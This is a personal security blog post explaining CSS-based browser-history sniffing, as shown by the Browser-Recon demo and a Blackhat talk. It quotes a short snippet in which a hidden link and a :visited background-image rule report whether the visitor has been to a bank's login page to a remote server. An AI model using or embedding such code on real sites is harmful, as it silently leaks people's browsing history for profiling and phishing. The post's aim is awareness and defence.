For years, about the only bookmarks in my browser that I think would count as ’scary’ would have been the links for Bonsai Kittens and anything Evil Dead related. But a while back a new one was added to the list and I find I can’t keep myself from going back to it every few weeks. It seemed appropriate again to bring up in light of some of the Blackhat talks. While it has a pretty innocuous name, the page never fails to make my jaw drop and my heart start pounding louder. If think you are strong enough, and have a clean pair of underwear within reach, surf over to  http://www.browser-recon.info

For those of you with weak bladders, let me quickly explain what the site does. Their page contains code that will compare a number of popular sites to determine which ones of them you have visited in the past, then dynamically show you a graphic based on those results. No clicking on a security pop up required. No strange browser configuration needed. Just some cleaver CSS checking at basically works like a human looking at a list of links to see which ones are blue (never been to before) or which ones are purple (visited links). While the thought of this keeps me up at night, I’m sure this has got to be the wet dream of numerous spammers and phishers. Talk about target marketing. Think anyone has figured out a way to data mine these results and done some crazy profiling?

And for that scary “not quite dead yet” moment, while disabling Javascript prevents the Browser-Recon site demo from showing your bank logo, disabling JavaScript alone is not enough to solve this issue. Jeremiah Grossman was nice enough to demonstrate at Blackhat both an javascript and non-javascript version. Simply use CSS and have it try to load a few well crafted background images if it correctly recognizes visited links. Here’s a little of the code. Notice the link tag without any text to click on.

<!-- Code snippet from Browser Recon.-->
<!-- CSS tags that will send a message back to our webserver of where you've been -->
<style type="text/css">
#n1004:visited { background: url(https://www.indiana.edu/~phishing/browser-recon/?url=1004&session=bc66632d49ca); }
</style>

<!-- A link with no text. We can check that for the "visited" property in CSS above -->
<a id="n1004" href="https://ibank.amsouth.com/auth/EnrollOverview.aspx"></a>

Now I can sleep a little better knowing there’s a Firefox plug-in to block this, but look when it was originally published.  November 20, 2005. That’s quite a bit of time and this feature is not yet patched? I’ve seen a lot of people grumbling over the state of security in web browsers recently (DNS Pinning being the latest pain point). With my noscript, safehistory, uninstalled java, disabled autocomplete, version of Firefox running in a VM… I can’t say I disagree.

-b3nn